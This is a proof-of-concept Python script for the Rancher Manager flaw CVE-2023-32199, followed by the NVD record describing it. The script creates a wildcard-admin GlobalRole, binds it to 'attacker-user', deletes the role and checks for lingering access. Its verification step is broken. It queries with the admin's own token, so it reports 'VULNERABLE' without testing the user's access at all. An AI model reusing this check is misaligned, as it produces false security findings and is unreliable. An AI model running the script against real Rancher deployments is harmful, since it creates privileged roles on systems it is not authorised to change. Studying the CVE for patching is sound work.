CVE-2023-32199

# CVE-2023-32199 PoC - Rancher Manager GlobalRole权限未回收 # This PoC demonstrates the vulnerability where user retains access after GlobalRole deletion import requests import json RANCHER_URL = "https://rancher.example.com" API_TOKEN = "token-xxxxx:xxxxxxxxxxxxx" HEADERS = {"Authorization": f"Bearer {API_TOKEN}", "Content-Type": "application/json"} def create_malicious_globalrole(): """Step 1: Create a GlobalRole with full admin privileges""" payload = { "type": "globalRole", "metadata": {"name": "malicious-admin-role"}, "rules": [ {"resources": ["*"], "apiGroups": ["*"], "verbs": ["*"]}, {"nonResourceURLs": ["*"], "verbs": ["*"]} ] } response = requests.post( f"{RANCHER_URL}/v1/management.cattle.io.globalRoles", headers=HEADERS, json=payload ) return response.json().get("metadata", {}).get("name") def bind_role_to_user(role_name, username): """Step 2: Bind the GlobalRole to target user""" payload = { "type": "globalRoleBinding", "metadata": {"generateName": "grb-"}, "globalRoleName": role_name, "userName": username } requests.post( f"{RANCHER_URL}/v1/management.cattle.io.globalRoleBindings", headers=HEADERS, json=payload ) def delete_globalrole(role_name): """Step 3: Admin deletes the GlobalRole (vulnerable behavior)""" requests.delete( f"{RANCHER_URL}/v1/management.cattle.io.globalRoles/{role_name}", headers=HEADERS ) def verify_persistence(username): """Step 4: Verify user still has admin access after deletion""" # Check if user can still access cluster resources response = requests.get( f"{RANCHER_URL}/v1/management.cattle.io.clusters", headers=HEADERS ) if response.status_code == 200: print(f"[!] VULNERABLE: User '{username}' still has access after GlobalRole deletion!") return True else: print(f"[+] PATCHED: Access properly revoked") return False if __name__ == "__main__": role_name = create_malicious_globalrole() bind_role_to_user(role_name, "attacker-user") delete_globalrole(role_name) verify_persistence("attacker-user")

{"cve": {"id": "CVE-2023-32199", "sourceIdentifier": "[email protected]", "published": "2025-10-29T15:15:40.260", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified within Rancher \nManager, where after removing a custom GlobalRole that gives \nadministrative access or the corresponding binding, the user still \nretains access to clusters. This only affects custom Global Roles that have a * on * in * rule for resources or have a * on * rule for non-resource URLs"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-281"}]}], "references": [{"url": "https://bugzilla.suse.com/show_bug.cgi?id=CVE-2023-32199", "source": "[email protected]"}, {"url": "https://github.com/rancher/rancher/security/advisories/GHSA-j4vr-pcmw-hx59", "source": "[email protected]"}]}}